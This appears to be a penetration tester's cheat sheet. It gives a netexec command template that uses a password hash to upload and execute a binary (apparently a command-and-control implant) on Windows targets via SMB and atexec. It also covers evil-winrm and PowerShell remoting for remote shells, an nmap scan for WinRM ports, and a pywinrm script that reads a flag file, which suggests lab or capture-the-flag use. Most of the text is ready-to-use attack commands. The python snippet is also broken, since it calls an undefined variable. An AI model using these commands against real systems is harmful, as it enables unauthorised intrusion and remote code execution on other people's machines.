netexec
Upload and execute file on target(s):
#TARGET="topwn.txt"
#TARGET="computers.txt"
TARGET="mx01.target.local"
#TARGET="srv.target.local"
USER="asdf_da"
#USER="users.txt"
#PASSHASH="-p myshittypass"
#PASSHASH="-H \"44444444444444444444444444444444\""
PASSHASH="-H ab7b75ff84475be2e8c4dcb7390955c3:ab7b75ff84475be2e8c4dcb7390955c3"
SOURCE_BIN="/home/kali/webserver/demon.x64.exe" # full path
TARGET_BIN="cmon.exe" # just the bin name and ext
EXEC_METHOD="--exec-method atexec"
#EXEC_METHOD=""
EXTRA=""
#EXTRA="--laps"
#EXTRA="--laps MyLocalAdministrator"
netexec smb $TARGET -u "$USER" $PASSHASH --put-file "$SOURCE_BIN" "\\Windows\\Temp\\$TARGET_BIN" -x "C:\\Windows\\Temp\\$TARGET_BIN" $EXEC_METHOD $EXTRAWinRm : Enter-PSSession / evil-winrm
ports:
5985 (HTTP) and 5986 (HTTPS) (Below Windows 7: 80 and 443)
# finding open ports
nmap -p5985,5986 -iL computers.txt -Pn -v# Connect from Linux
evil-winrm -i Server01 -u USER -p PASS# Connect from Windows
Enter-PSSession Server01 # automation (python3)
# pip install pywinrm # (see ref for optional deps)
# ref: https://pypi.org/project/pywinrm/
import winrm
sess = winrm.Session(
'10.10.10.10',
auth=(
'administrator',
'badminton'
),
transport='ntlm'
)
# run powershell command
r = session.run_ps("whoami")
print(r.std_out)
print(r.std_err)
# run
print(session.run("type c://users//mike//Desktop//flag.txt").std_out)About WinRm
Using the WS-Management protocol, Windows PowerShell remoting lets you run any Windows PowerShell command on one or more remote computers.
To start an interactive session with a single remote computer, use the Enter-PSSession cmdlet. For example, to start an interactive session with the Server01 remote computer, type:
Enter-PSSession Server01~ Microsoft Docs1
Microsoft has implemented the WS-Management standard in Windows Remote Management 1.1 (WinRM)
By default WinRM HTTP uses port 80 and HTTPS uses port 443. On Windows 7 and higher the default ports are 5985 and 5986, respectively.
~ Wikipedia2